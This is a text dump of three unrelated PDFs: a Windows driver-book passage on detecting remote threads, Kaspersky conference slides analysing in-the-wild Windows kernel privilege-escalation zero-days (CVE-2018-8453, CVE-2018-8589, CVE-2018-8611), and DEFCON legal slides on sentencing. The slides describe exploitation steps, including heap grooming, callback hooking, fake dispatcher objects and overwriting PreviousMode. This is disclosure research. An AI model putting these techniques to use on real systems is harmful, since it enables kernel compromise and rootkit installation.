const ULONG MaxProcesses = 32;
ULONG NewProcesses[MaxProcesses];
ULONG NewProcessesCount;
ExecutiveResource ProcessesLock;
LIST_ENTRY RemoteThreadsHead;
FastMutex RemoteThreadsLock;
LookasideList<RemoteThreadItem> Lookaside;
There are a few class wrappers for kernel APIs we haven’t seen yet. FastMutex is the same we used in
the SysMon driver. ExecutiveResource is a wrapper for an ERESOURCE structure and APIs we looked
at in chapter 6. Here is its declaration and definition:
Chapter 9: Process and Thread Notifications
298
// ExecutiveResource.h
struct ExecutiveResource {
void Init();
void Delete();
void Lock();
void Unlock();
void LockShared();
void UnlockShared();
private:
ERESOURCE m_res;
bool m_CritRegion;
};
// ExecutiveResource.cpp
void ExecutiveResource::Init() {
ExInitializeResourceLite(&m_res);
}
void ExecutiveResource::Delete() {
ExDeleteResourceLite(&m_res);
}
void ExecutiveResource::Lock() {
m_CritRegion = KeAreApcsDisabled();
if(m_CritRegion)
ExAcquireResourceExclusiveLite(&m_res, TRUE);
else
ExEnterCriticalRegionAndAcquireResourceExclusive(&m_res);
}
void ExecutiveResource::Unlock() {
if (m_CritRegion)
ExReleaseResourceLite(&m_res);
else
ExReleaseResourceAndLeaveCriticalRegion(&m_res);
}
void ExecutiveResource::LockShared() {
Chapter 9: Process and Thread Notifications
299
m_CritRegion = KeAreApcsDisabled();
if (m_CritRegion)
ExAcquireResourceSharedLite(&m_res, TRUE);
else
ExEnterCriticalRegionAndAcquireResourceShared(&m_res);
}
void ExecutiveResource::UnlockShared() {
Unlock();
}
A few things are worth noting:
• Acquiring an Executive Resource must be done in a critical region (when normal kernel APCs are
disabled). The call to KeAreApcsDisabled returns true if normal kernel APCs are disabled. In that
case a simple acquisition will do; otherwise, a critical region must be entered first, so the “shortcuts”
to enter a critical region and acquire the Executive Resource are used.
A similar API, KeAreAllApcsDisabled returns true if all APCs are disabled (essentially
whether the thread is in a guarded region).
• An Executive Resource is used to protect the NewProcesses array from concurrent write access.
The idea is that more reads than writes are expected for this data. In any case, I wanted to show a
possible wrapper for an Executive Resource.
• The class presents an interface that can work with the Locker<TLock> type we have been using for
exclusive access. For shared access, the LockShared and UnlockShared methods are provided.
To use them conveniently, a companion class to Locker<> can be written to acquire the lock in a
shared manner. Here is its definition (in Locker.h as well):
template<typename TLock>
struct SharedLocker {
SharedLocker(TLock& lock) : m_lock(lock) {
lock.LockShared();
}
~SharedLocker() {
m_lock.UnlockShared();
}
private:
TLock& m_lock;
};
LookasideList<T> is a wrapper for lookaside lists we met in chapter 8. It’s using the new API, as it’s
easier for selecting the pool type required. Here is its definition (in LookasideList.h):
Chapter 9: Process and Thread Notifications
300
template<typename T>
struct LookasideList {
NTSTATUS Init(POOL_TYPE pool, ULONG tag) {
return ExInitializeLookasideListEx(&m_lookaside, nullptr, nullptr,
pool, 0, sizeof(T), tag, 0);
}
void Delete() {
ExDeleteLookasideListEx(&m_lookaside);
}
T* Alloc() {
return (T*)ExAllocateFromLookasideListEx(&m_lookaside);
}
void Free(T* p) {
ExFreeToLookasideListEx(&m_lookaside, p);
}
private:
LOOKASIDE_LIST_EX m_lookaside;
};
Going back to the data members for this driver. The purpose of the NewProcesses array is to keep track
of new processes before their first thread is created. Once the first thread is created, and identified as such,
the array will drop the process in question, because from that point on, any new thread created in that
process from another process is a remote thread for sure. We’ll see all that in the callbacks implementations.
The driver uses a simple array rather than a linked list, because I don’t expect a lot of processes with no
threads to exist for more than a tiny fraction, so a fixed sized array should be good enough. However, you
can change that to a linked list to make this bulletproof.
When a new process is created, it should be added to the NewProcesses array since the process has zero
threads at that moment:
void OnProcessNotify(PEPROCESS Process, HANDLE ProcessId,
PPS_CREATE_NOTIFY_INFO CreateInfo) {
UNREFERENCED_PARAMETER(Process);
if (CreateInfo) {
if (!AddNewProcess(ProcessId)) {
KdPrint((DRIVER_PREFIX "New process created, no room to store\n"));
}
else {
KdPrint((DRIVER_PREFIX "New process added: %u\n", HandleToULong(Pro\
Chapter 9: Process and Thread Notifications
301
cessId)));
}
}
}
AddProcess locates an empty “slot” in the array and puts the process ID in it:
bool AddNewProcess(HANDLE pid) {
Locker locker(ProcessesLock);
if (NewProcessesCount == MaxProcesses)
return false;
for(int i = 0; i < MaxProcesses; i++)
if (NewProcesses[i] == 0) {
NewProcesses[i] = HandleToUlong(pid);
break;
}
NewProcessesCount++;
return true;
}
Now comes the interesting part: the thread create/exit callback.
1. Add process names to the data maintained by the driver for each remote thread. A
remote thread is when the creator (the caller) is different than the process in which the
new thread is created. We also have to remove some false positives:
void OnThreadNotify(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create) {
if (Create) {
bool remote = PsGetCurrentProcessId() != ProcessId
&& PsInitialSystemProcess != PsGetCurrentProcess()
&& PsGetProcessId(PsInitialSystemProcess) != ProcessId;
The second and third checks make sure the source process or target process is not the System process. The
reasons for the System process to exist in these cases are interesting to investigate, but are out of scope for
this book - we’ll just remove these false positives. The question is how to identify the System process. All
versions of Windows from XP have the same PID for the System process: 4. We could use that number
because it’s unlikely to change in the future, but there is another way, which is foolproof and also allows
me to introduce something new.
Chapter 9: Process and Thread Notifications
302
The kernel exports a global variable, PsInitialSystemProcess, which always points to the System
process’ EPROCESS structure. This pointer can be used just like any other opaque process pointer.
If the thread is indeed remote, we must check if it’s the first thread in the process, and if so, discard this
as a remote thread:
if (remote) {
//
// really remote if it's not a new process
//
bool found = FindProcess(ProcessId);
FindProcess searches for a process ID in the NewProcesses array:
bool FindProcess(HANDLE pid) {
auto id = HandleToUlong(pid);
SharedLocker locker(ProcessesLock);
for (int i = 0; i < MaxProcesses; i++)
if (NewProcesses[i] == id)
return true;
return false;
}
If the process is found, then it’s the first thread in the process and we should remove the process from the
new processes array so that subsequent remote threads (if any) can be identified as such:
if (found) {
//
// first thread in process, remove process from new processes array
//
RemoveProcess(ProcessId);
}
RemoveProcess searches for the PID and removes it from the array by zeroing it out:
Chapter 9: Process and Thread Notifications
303
bool RemoveProcess(HANDLE pid) {
auto id = HandleToUlong(pid);
Locker locker(ProcessesLock);
for (int i = 0; i < MaxProcesses; i++)
if (NewProcesses[i] == id) {
NewProcesses[i] = 0;
NewProcessesCount--;
return true;
}
return false;
}
If the process isn’t found, then it’s not new and we have a real remote thread on our hands:
else {
//
// really a remote thread
//
auto item = Lookaside.Alloc();
auto& data = item->Remote;
KeQuerySystemTimePrecise(&data.Time);
data.CreatorProcessId = HandleToULong(PsGetCurrentProcessId());
data.CreatorThreadId = HandleToULong(PsGetCurrentThreadId());
data.ProcessId = HandleToULong(ProcessId);
data.ThreadId = HandleToULong(ThreadId);
KdPrint((DRIVER_PREFIX
"Remote thread detected. (PID: %u, TID: %u) -> (PID: %u, TID: %u)\n",
data.CreatorProcessId, data.CreatorThreadId,
data.ProcessId, data.ThreadId));
Locker locker(RemoteThreadsLock);
// TODO: check the list is not too big
InsertTailList(&RemoteThreadsHead, &item->Link);
}
Getting the data to a user mode client can be done in the same way as we did for the SysMon driver:
Chapter 9: Process and Thread Notifications
304
NTSTATUS DetectorRead(PDEVICE_OBJECT, PIRP Irp) {
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
auto len = irpSp->Parameters.Read.Length;
auto status = STATUS_SUCCESS;
ULONG bytes = 0;
NT_ASSERT(Irp->MdlAddress);
auto buffer = (PUCHAR)MmGetSystemAddressForMdlSafe(
Irp->MdlAddress, NormalPagePriority);
if (!buffer) {
status = STATUS_INSUFFICIENT_RESOURCES;
}
else {
Locker locker(RemoteThreadsLock);
while (true) {
//
// if the list is empty, there is nothing else to give
//
if (IsListEmpty(&RemoteThreadsHead))
break;
//
// if remaining buffer size is too small, break
//
if (len < sizeof(RemoteThread))
break;
auto entry = RemoveHeadList(&RemoteThreadsHead);
auto info = CONTAINING_RECORD(entry, RemoteThreadItem, Link);
ULONG size = sizeof(RemoteThread);
memcpy(buffer, &info->Remote, size);
len -= size;
buffer += size;
bytes += size;
//
// return data item to the lookaside list
//
Lookaside.Free(info);
}
}
return CompleteRequest(Irp, status, bytes);
}
Chapter 9: Process and Thread Notifications
305
Because there is just one type of “event” and it has a fixed size, the code is simpler than in the SysMon
case.
The full driver code is in the KDetector project in the solution for this chapter.
The Detector Client
The client code is very similar to the SysMon client, but simpler, because all “events” have the same
structure and are even fixed-sized. Here are the main and DisplayData functions:
void DisplayData(const RemoteThread* data, int count) {
for (int i = 0; i < count; i++) {
auto& rt = data[i];
DisplayTime(rt.Time);
printf("Remote Thread from PID: %u TID: %u -> PID: %u TID: %u\n",
rt.CreatorProcessId, rt.CreatorThreadId, rt.ProcessId, rt.ThreadId);
}
}
int main() {
HANDLE hDevice = CreateFile(L"\\\\.\\kdetector", GENERIC_READ, 0,
nullptr, OPEN_EXISTING, 0, nullptr);
if (hDevice == INVALID_HANDLE_VALUE)
return Error("Error opening device");
RemoteThread rt[20];
// fixed array is good enough
for (;;) {
DWORD bytes;
if (!ReadFile(hDevice, rt, sizeof(rt), &bytes, nullptr))
return Error("Failed to read data");
DisplayData(rt, bytes / sizeof(RemoteThread));
Sleep(1000);
}
CloseHandle(hDevice);
return 0;
}
The DisplayTime is the same one from the SysMonClient project.
We can test the driver by installing it and starting it normally, and launching our client (or we can use
DbgView to see the remote thread outputs). The classic example of a remote thread (as mentioned earlier)
is when a debugger wishes to forcefully break into a target process. Here is one way to do that:
Chapter 9: Process and Thread Notifications
306
1. Run some executable, say Notepad.exe.
2. Launch WinDbg.
3. Use WinDbg to attach to the Notepad process. A remote thread notification should appear.
Here are some examples of output when the detector client is running:
13:08:15.280: Remote Thread from PID: 7392 TID: 4788 -> PID: 8336 TID: 9384
13:08:58.660: Remote Thread from PID: 7392 TID: 13092 -> PID: 8336 TID: 13288
13:10:52.313: Remote Thread from PID: 7392 TID: 13092 -> PID: 8336 TID: 12676
13:11:25.207: Remote Thread from PID: 15268 TID: 7564 -> PID: 1844 TID: 6688
13:11:25.209: Remote Thread from PID: 15268 TID: 15152 -> PID: 1844 TID: 7928
You might find some remote thread entries surprising (run Process Explorer for a while, for example)
The full code of the client is in the Detector project.
Display process names in the client.
Summary
In this chapter we looked at some of the callback mechanisms provided by the kernel: process, thread
and image loads. In the next chapter, we’ll continue with more callback mechanisms - opening handles to
certain object types, and Registry notifications. | pdf |
Momigari
Overview of the latest Windows OS kernel exploits
found in the wild
Boris Larin
@oct0xor
30-May-19
Anton Ivanov
@antonivanovm
$whoweare
Senior Malware Analyst (Heuristic Detection and Vulnerability Research Team)
Boris Larin
Head of Advanced Threats Research and Detection Team
Anton Ivanov
Twitter: @oct0xor
Twitter: @antonivanovm
3
What this talk is about
Momigari: the Japanese tradition
of searching for the most beautiful
leaves in autumn
Jiaohe city, Jilin province, Northeast China. [Photo/Xinhua]
http://en.safea.gov.cn/2017-10/26/content_33734832_2.htm
4
What this talk is about
1) We will give brief introduction about how we find zero-day exploits and challenges that we face
2) We will cover three Elevation of Privilege (EOP) zero-day exploits that we found exploited in the wild
•
It is becoming more difficult to exploit the Windows OS kernel
•
Samples encountered ITW provide insights on the current state of things and new techniques
•
We will cover in detail the implementation of two exploits for Windows 10 RS4
3) We will reveal exploitation framework used to distribute some of these exploits
5
What this talk is about
Kaspersky Lab detection technologies
6
We commonly add this detail to our reports:
This two technologies are behind all exploits that we found last year
Technology #1 - Exploit Prevention
7
Delivery
Memory
manipulation
Exploitation
Shellcode
execution
Exploitation
prevented
Detection and
blocking
Payload
execution
start
Technology #2 - The sandbox
Artifacts assembled
for analysis
A file / URL for testing
- Execution logs
- Memory dumps
- System / registry changes
- Network connections
- Screenshots
- Exploit artifacts
Verdict and rich data on activity
Test VMs
The file / URL is sent to several test VMs
Artifacts logged
Detection of exploits
Find
Develop
Research
How-to:
Exploits caught in the wild by Kaspersky Lab
• May 2018 - CVE-2018-8174 (Windows VBScript Engine Remote Code Execution
Vulnerability)
• October 2018 - CVE-2018-8453 (Win32k Elevation of Privilege Vulnerability)
• November 2018 - CVE-2018-8589 (Win32k Elevation of Privilege Vulnerability)
• December 2018 - CVE-2018-8611 (Windows Kernel Elevation of Privilege
Vulnerability)
• March 2019 - CVE-2019-0797 (Win32k Elevation of Privilege Vulnerability)
• April 2019 - CVE-2019-0859 (Win32k Elevation of Privilege Vulnerability)
One year:
What keeps us wake at night
Six exploits found just by one company in one year
One exploit is remote code execution in Microsoft Office
Five exploits are elevation of privilege escalations
While these numbers are huge it got to be just a tip of an iceberg
Example of payouts for single exploit acquisition program
https://zerodium.com/program.html:
Why don’t we see many exploits targeting web browsers, other
applications or networks with ‘zero-click’ RCE being caught?
Even if an exploit was detected, most case analysis requires more data than can be acquired by the detection
alone
Zero-day finding complications
Our technologies are aimed at detection and prevention of exploitation
But to find out whether or not detected exploit is zero-day requires additional analysis
Some exploits are easy to detect
Sandboxed process starts to perform weird stuff
Some exploits are hard to detect
False Alarms caused by other software
Example: two or more security software installed on same machine
Field for improvement (web browsers)
Script of exploit is required for further analysis
Scanning the whole memory for all scripts is still impractical
Possible solution:
Browser provides interface for security applications to ask for loaded scripts (similar to Antimalware Scan
Interface (AMSI))
Problems:
If implemented in the same process it can be patched by exploit
Detection of escalation of privilege
Escalation of privilege exploits are commonly used in late stages of exploitation
Current events provided by operating system often are enough to build detection for them
As they are usually implemented in native code - they are can be analyzed easily
Escalation of privilege exploits are probably the most suitable for analysis
15
Case 1
CVE-2018-8453
Exploitation module was distributed in encrypted form.
Sample that we found was targeting only x64 platform
•
But analysis shows that x86 exploitation is possible
Code is written to support next OS versions:
•
Windows 10 build 17134
•
Windows 10 build 16299
•
Windows 10 build 15063
•
Windows 10 build 14393
•
Windows 10 build 10586
•
Windows 10 build 10240
•
Windows 8.1
•
Windows 8
•
Windows 7
16
Win32k
Three of four vulnerabilities we are going to talk about today are present in Win32k
Win32k is a kernel mode driver that handles graphics, user input, UI elements…
It present since the oldest days of Windows
At first it was implemented in user land and then the biggest part of it was moved to kernel level
•
To increase performance
Really huge attack surface
•
More than 1000 syscalls
•
User mode callbacks
•
Shared data
More than a half of all kernel security bugs in windows are found in win32k.sys
https://github.com/Microsoft/MSRC-Security-Research/blob/master/presentations/2018_10_DerbyCon/2018_10_DerbyCon_State_of%20_Win32k_Security.pptx
17
Security improvements
In past few years Microsoft made a number of improvements that really complicated kernel exploitation and
improved overall security:
Prevent abuse of specific kernel structures commonly used to create an R/W primitive
•
Additional checks over tagWND
•
Hardening of GDI Bitmap objects (Type Isolation of SURFACE objects)
•
…
Improvement of kernel ASLR
•
Fixed a number of ways to disclose kernel pointers through shared data
CVE-2018-8453 was the first known exploit targeting Win32k in Windows 10 RS4
Results of this work really can be seen from exploits that we find. Newer OS build = less exploits.
18
CVE-2018-8453
From code it feels like the exploit did not initially support Windows 10 build
17134, and the support was added later
There is a chance that the exploit was used prior to the release of this build,
but we do not have any proof
19
CVE-2018-8453
win32k!tagWND (Windows 7 x86)
Vulnerability is located in syscall
NtUserSetWindowFNID
Microsoft took away win32k!tagWND from debug
symbols but FNID field is located on same offset in
Windows 10 (17134)
FNID (Function ID) defines a class of window
(it can be ScrollBar, Menu, Desktop, etc.)
High bit also defines if window is being freed
•
FNID_FREED = 0x8000
20
CVE-2018-8453
In NtUserSetWindowFNID syscall tagWND->fnid is
not checked if it equals to 0x8000 (FNID_FREED)
Possible to change FNID of window that is
being released
21
CVE-2018-8453
Microsoft patched vulnerability with call to
IsWindowBeingDestroyed() function
22
CVE-2018-8453
At time of reporting, MSRC was not sure that exploitation was possible in the latest version build of
Windows 10 and asked us to provide the full exploit
The following slides show pieces of the reverse engineered exploit for Windows 10 build 17134
For obvious reasons we are not going to share the full exploit
23
CVE-2018-8453
Exploitation happens mostly from hooks set on usermode callbacks
Hooked callbacks:
To set hooks:
•
Get address of KernelCallbackTable from PEB
•
Replace callback pointers with our own handlers
fnDWORD
fnNCDESTROY
fnINLPCREATESTRUCT
Patch Table
24
CVE-2018-8453
Exploit creates window and uses ShowWindow()
callback will be triggered
*Shadow will be needed later for exploitation
fnINLPCREATESTRUCT
SetWindowPos() will force ShowWindow() to call AddShadow() and create shadow
25
CVE-2018-8453
Exploit creates scrollbar and performs heap groom
•
Its performed with message WM_LBUTTONDOWN sent to scrollbar window
•
Leads to execution of win32k!xxxSBTrackInit() in kernel
A left mouse button click on the scrollbar initiates scrollbar track
Prepare memory layout
Send message to scrollbar window for initiation
26
CVE-2018-8453
In exploit there are five (!) different heap groom tactics
What distinguish zero-day exploits from regular public exploits?
Usually it’s the amount of effort put into to achieve best reliability
27
CVE-2018-8453
fengshui_17134: Blind heap groom
fengshui_16299:
•
Register 0x400 classes (lpszMenuName =
0x4141…)
•
Create windows
•
Use technique described by Tarjei Mandt to leak
addresses
NtCurrentTeb()->Win32ClientInfo.ulClientDelta
fengshui_15063 is similar to fengshui_16299
fengshui_14393:
•
Create 0x200 bitmaps
•
Create accelerator table
•
Leak address with gSharedInfo
•
Destroy accelerator table
•
Create 0x200 bitmaps
fengshui_simple: CreateBitmap & GdiSharedHandleTable
Windows 10 Mitigation Improvements
28
CVE-2018-8453
xxxSBTrackInit() will eventually execute xxxSendMessage(, 0x114,…)
0x114 is WM_HSCROLL message
Translate message to callback
WM_HSCROLL fnDWORD callback
How callbacks are executed?
29
CVE-2018-8453
In exploit there is state machine inside the fnDWORD usermode callback hook
•
State machine is required because fnDWORD usermode callback is called very often
•
We have two stages of exploitation inside fnDWORD hook
Stage 1 - Destroy window inside fnDWORD usermode callback during WM_HSCROLL message
First thing that is going to be released is shadow (that’s why shadow is required to be initialized)
It will lead to execution of fnNCDESTROY callback
30
CVE-2018-8453
During fnNCDESTROY usermode callback find freed shadow and trigger vulnerability
FNID of shadow window is no longer FNID_FREED!
Call stack:
31
CVE-2018-8453
Due to changed FNID message WM_CANCELMODE will lead to freeing of USERTAG_SCROLLTRACK!
Stage 2 (inside the fnDWORD hook)
This will eventually result in Double Free
Call stack:
32
CVE-2018-8453
Freeing USERTAG_SCROLLTRACK with WM_CANCELMODE gives opportunity to reclaim just freed memory
Free bitmats allocated in Fengshui(), and allocate some more
33
CVE-2018-8453
xxxSBTrackInit() will finish execution with freeing USERTAG_SCROLLTRACK
But it will result in freeing GDITAG_POOL_BITMAP_BITS instead
Free USERTAG_SCROLLTRACK
Free GDITAG_POOL_BITMAP_BITS
Double free:
34
CVE-2018-8453
New mitigation: GDI objects isolation (Implemented in Windows 10 RS4)
Good write-up by Francisco Falcon can be found here:
https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html
New mitigation eliminates common exploitation technique of using Bitmaps:
•
SURFACE objects used for exploitation are now not allocated aside of pixel data buffers
Use of Bitmap objects for kernel exploitation was believed to be killed
But as you can see it will not disappear completely
35
CVE-2018-8453
Exploit creates 64 threads
Each thread is then converted to GUI thread after using win32k functionality
THREADINFO is undocumented but structure is partially available through win32k!_w32thread
GetBitmapBits / SetBitmapBits is used to overwrite THREADINFO data
It leads to THREADINFO to be allocated in place of dangling bitmap
36
CVE-2018-8453
Control over THREADINFO allows to use SetMessageExtraInfo gadget
Peek and poke *(u64*)((*(u64*) THREADINFO+0x1A8)+0x198)
0x1A8 - Message queue
0x198 - Extra Info
37
CVE-2018-8453
Replace message queue pointer with arbitrary address
Read quadword, but overwrite it with zero
Restore message queue pointer
Replace message queue pointer with arbitrary address
Set quadword at address
Restore message queue pointer
Restore original value
38
CVE-2018-8453
THREADINFO also contains pointer to process object
Exploit uses it to steal system token
39
Case 2
CVE-2018-8589
Probably the least interesting exploit presented
today but it led to far greater discoveries
Race condition in win32k
Exploit found in the wild was targeting only
Windows 7 SP1 32-bit
At least two processor cores are required
40
CVE-2018-8589
CVE-2018-8589 is a complex race condition in win32k due to improper locking of messages sent
synchronously between threads
Found sample exploited with the use of MoveWindow() and WM_NCCALCSIZE message
41
CVE-2018-8589
Both threads have the same window procedure
Second thread initiates recursion
Thread 1
Thread 2
42
CVE-2018-8589
Window procedure
Recursion inside WM_NCCALCSIZE window message callback
Move window of opposite thread to increase recursion
Opposite thread
This thread
Trigger race condition on maximum level of recursion during
thread termination
43
CVE-2018-8589
For exploitation is enough to fill buffer with pointers to shellcode. Return address of SfnINOUTNCCALCSIZE
will be overwritten and execution hijacked
Vulnerability will lead to asynchronous copying of the lParam structure controlled by the attacker
44
Framework
CVE-2018-8589 led to bigger discoveries as it was a part of a larger exploitation framework
• AV evasion
• Choosing appropriate exploit reliably
• DKOM manipulation to install rootkit
Framework purposes
45
Framework - AV evasion
Exploit checks the presence of emet.dll and if it is not present it uses trampolines to execute all functions
•
Searches for patterns in text section of system libraries
•
Uses gadgets to build fake stack and execute functions
/* build fake stack */
push ebp
mov
ebp, esp
push offset gadget_ret
push ebp
mov
ebp, esp
push offset gadget_ret
push ebp
mov
ebp, esp
…
/* push args*/
…
/* push return address*/
push offset trampilne_prolog
/* jump to function */
jmp
eax
46
Framework - Reliability
Exploit may be triggered more than once
For reliable exploitation proper mutual exclusion is required
Otherwise execution of multiple instances of EOP exploit will lead to BSOD
Use of CreateMutex() function may arouse suspicion
47
Framework - Reliability
Existence of memory block means exploit is running
Create Mutex
48
Framework - Reliability
Framework may come with multiple exploits (embedded or received from remote resource)
Exploits perform Windows OS version checks to find if exploit supports target
Framework is able to try different exploits until it finds an appropriate one
Each exploit provides interface to execute provided kernel shellcode
Maximum for embedded exploits
We have seen 4 different exploits
49
Framework - Armory
CVE-2018-8589
CVE-2015-2360
CVE-2018-8611
CVE-2019-0797
?
?
?
We have found 4. But the maximum is 10?
50
Case 3
CVE-2018-8611
Race condition in tm.sys driver
Code is written to support next OS versions:
•
Windows 10 build 15063
•
Windows 10 build 14393
•
Windows 10 build 10586
•
Windows 10 build 10240
•
Windows 8.1
•
Windows 8
•
Windows 7
New build of exploit added support for:
•
Windows 10 build 17133
•
Windows 10 build 16299
Allows to escape the sandbox in Chrome and Edge because
syscall filtering mitigations do not apply to ntoskrnl.exe syscalls
51
CVE-2018-8611
tm.sys driver implements Kernel Transaction Manager (KTM)
It is used to handle errors:
•
Perform changes as a transaction
•
If something goes wrong then rollback changes to file system or registry
It can also be used to coordinate changes if you are designing a new data storage system
52
CVE-2018-8611
Resource manager objects
Transaction objects
Enlistment objects
KTM Objects
Transaction manager objects
Transaction - a collection of data operations
Resource manager - component that manages data resources that can be updated by transacted operations
Transaction manager - it handles communication of transactional clients and resource managers
It also tracks the state of each transaction (without data)
Enlistment - an association between a resource manager and a transaction
53
CVE-2018-8611
To abuse the vulnerability the exploit first creates a named pipe and opens it for read and write
Then it creates a pair of new transaction manager objects, resource manager objects, transaction objects
Transaction 1
Transaction 2
54
CVE-2018-8611
Transaction 1
Transaction 2
55
CVE-2018-8611
Exploit creates multiple threads and binds them to a single CPU core
Thread 1 calls NtQueryInformationResourceManager in a loop
Thread 2 tries to execute NtRecoverResourceManager once
56
CVE-2018-8611
Exploitation happens inside third thread
This thread executes NtQueryInformationThread to get last syscall of thread with RecoverResourceManager
Successful execution of NtRecoverResourceManager will mean that race condition has occurred
At this stage, execution of WriteFile on previously created named pipe will lead to memory corruption
57
CVE-2018-8611
CVE-2018-8611 is a race condition in function TmRecoverResourceManagerExt
Check that ResourceManager is online at function start
Check that enlistment is finalized
But it may happen that ResourceManager will be destroyed before all enlistments will be processed
…
58
CVE-2018-8611
Microsoft fixed vulnerability with following changes:
•
Check for enlistment status is removed
•
Check that ResourceManager is still online is added
59
CVE-2018-8611
We have control over enlistment object. How to exploit that?
There are not many different code paths
We are able to AND arbitrary value if it passes a check.
Seems to be hard to exploit.
60
CVE-2018-8611
We have control over enlistment object. How to exploit that?
There are not many different code paths
We can craft our own object (PVOID)(v10 + 64)
61
CVE-2018-8611
62
CVE-2018-8611
Dispatcher objects:
nt!_KEVENT
nt!_KMUTANT
nt!_KSEMAPHORE
nt!_KTHREAD
nt!_KTIMER
…
dt nt!_KTHREAD
+0x000 Header : _DISPATCHER_HEADER
…
dt nt!_DISPATCHER_HEADER
+0x000 Lock : Int4B
+0x000 LockNV
: Int4B
+0x000 Type : UChar
+0x001 Signalling
: UChar
…
63
CVE-2018-8611
dt nt!_KOBJECTS
EventNotificationObject = 0n0
EventSynchronizationObject = 0n1
MutantObject = 0n2
ProcessObject = 0n3
QueueObject = 0n4
SemaphoreObject = 0n5
ThreadObject = 0n6
GateObject = 0n7
TimerNotificationObject = 0n8
TimerSynchronizationObject = 0n9
Spare2Object = 0n10
Spare3Object = 0n11
Spare4Object = 0n12
Spare5Object = 0n13
Spare6Object = 0n14
Spare7Object = 0n15
Spare8Object = 0n16
ProfileCallbackObject = 0n17
ApcObject = 0n18
DpcObject = 0n19
DeviceQueueObject = 0n20
PriQueueObject = 0n21
InterruptObject = 0n22
ProfileObject = 0n23
Timer2NotificationObject = 0n24
Timer2SynchronizationObject = 0n25
ThreadedDpcObject = 0n26
MaximumKernelObject = 0n27
64
CVE-2018-8611
Provide fake EventNotificationObject
65
CVE-2018-8611
While current thread is in a wait state we can modify dispatcher object from user level
We have address of _KWAIT_BLOCK, we can calculate address of _KTHREAD
0: kd> dt nt!_KTHREAD
+0x000 Header : _DISPATCHER_HEADER
+0x018 SListFaultAddress : Ptr64 Void
+0x020 QuantumTarget
: Uint8B
+0x028 InitialStack
: Ptr64 Void
+0x030 StackLimit
: Ptr64 Void
+0x038 StackBase
: Ptr64 Void
+0x040 ThreadLock
: Uint8B
...
+0x140 WaitBlock
: [4] _KWAIT_BLOCK
+0x140 WaitBlockFill4 : [20] UChar
+0x154 ContextSwitches : Uint4B
...
_KTHREAD = _KWAIT_BLOCK - 0x140
66
CVE-2018-8611
Modify dispatcher object, build SemaphoreObject
0: kd> dt nt!_KMUTANT
+0x000 Header : _DISPATCHER_HEADER
+0x018 MutantListEntry : _LIST_ENTRY
+0x028 OwnerThread
: Ptr64 _KTHREAD
+0x030 Abandoned : UChar
+0x031 ApcDisable
: UChar
mutex->Header.Type = SemaphoreObject;
mutex->Header.SignalState = 1;
mutex->OwnerThread = Leaked_KTHREAD;
mutex->ApcDisable = 0;
mutex->MutantListEntry = Fake_LIST;
mutex->Header.WaitListHead.Flink =
0: kd> dt nt!_KWAIT_BLOCK
+0x000 WaitListEntry
: _LIST_ENTRY
+0x010 WaitType
: UChar
+0x011 BlockState
: UChar
+0x012 WaitKey
: Uint2B
+0x014 SpareLong
: Int4B
+0x018 Thread : Ptr64 _KTHREAD
+0x018 NotificationQueue : Ptr64 _KQUEUE
+0x020 Object : Ptr64 Void
+0x028 SparePtr
: Ptr64 Void
67
CVE-2018-8611
waitBlock.WaitType = 3;
waitBlock.Thread = Leaked_KTHREAD + 0x1EB;
0: kd> dt nt!_KWAIT_BLOCK
+0x000 WaitListEntry
: _LIST_ENTRY
+0x010 WaitType
: UChar
+0x011 BlockState
: UChar
+0x012 WaitKey
: Uint2B
+0x014 SpareLong
: Int4B
+0x018 Thread : Ptr64 _KTHREAD
+0x018 NotificationQueue : Ptr64 _KQUEUE
+0x020 Object : Ptr64 Void
+0x028 SparePtr
: Ptr64 Void
Call to GetThreadContext(…) will make
KeWaitForSingleObject continue execution
Add one more thread to WaitList with WaitType = 1
68
CVE-2018-8611
Fake Semaphore object will be passed to KeReleaseMutex that is a wrapper for KeReleaseMutant
Check for current thread will be bypassed because we were able to leak it
69
CVE-2018-8611
Since WaitType of crafted WaitBlock is equal to three, this WaitBlock will be passed to KiTryUnwaitThread
70
CVE-2018-8611
KiTryUnwaitThread is a big function but the most interesting is located at function end
This was set to Leaked_KTHREAD + 0x1EB
We are able to set Leaked_KTHREAD + 0x1EB + 0x40 to 0!
71
CVE-2018-8611
KTHREAD + 0x22B
0: kd> dt nt!_KTHREAD
...
+0x228 UserAffinity
: _GROUP_AFFINITY
+0x228 UserAffinityFill : [10] UChar
+0x232 PreviousMode
: Char
+0x233 BasePriority
: Char
+0x234 PriorityDecrement : Char
72
CVE-2018-8611
One byte to rule them all
73
CVE-2018-8611
With ability to use NtReadVirtualMemory, further elevation of privilege and installation of rootkit is trivial
Possible mitigation improvements:
•
Hardening of Kernel Dispatcher Objects
•
Validation with secret for PreviousMode
Abuse of dispatcher objects seems to be a valuable exploitation technique
•
Huge thanks to Microsoft for handling our findings very fast.
•
Zero-days seems to have a long lifespan. Good vulnerabilities survive mitigations.
•
Attackers know that if an exploit is found it will be found by a security vendor. There is a shift to implement
better AV evasion.
•
Two exploits that we found were for the latest builds of Windows 10, but most zero-day that are found are
for older versions. It means that effort put into mitigations is working.
•
Race condition vulnerabilities are on the rise. Three of the five vulnerabilities that we found are race
conditions. Very good fuzzers ( reimagination of Bochspwn? ) or static analysis? We are going to see more
vulnerabilities like this.
•
Win32k lockdown and syscall filtering are effective, but attackers switch to exploit bugs in ntoskrnl.
•
We revealed a new technique with the use of dispatcher objects and PreviousMode.
74
Conclusions
Momigari: Overview of the latest Windows OS kernel exploits
found in the wild
Twitter: @antonivanovm
Anton Ivanov
Kaspersky Lab
Twitter: @oct0xor
Boris Larin
Kaspersky Lab
Q&A ? | pdf |
DEFCON 17
July 31, 2009
R.W. Clark
United States v. Prochner, 417 F.3d 54 (D. Mass.
July 22, 2005)
Definition of Special Skills
Special skill - a skill not possessed by members of the
general public and usually requiring substantial
education, training or licensing.
Examples - pilots, lawyers, doctors, accountants,
chemists, and demolition experts
Not necessarily have formal education or training
Acquired through experience or self-tutelage
Critical question is - whether the skill set elevates to a
level of knowledge and proficiency that eclipses that
possessed by the general public.
Court Recognizes Your
Special Skills
Feds won't deem proxies 'sophisticated'
US government has dropped --for now--a plan to classify the use of
"proxy“ servers as evidence of sophistication in committing a crime.
US Sentencing Commission was considering a change to federal
sentencing guidelines that would have increased sentences by about 25
percent for people convicted of crimes in which proxies are used to
hide the perpetrators' tracks.
Digital-rights advocates complained language too broad
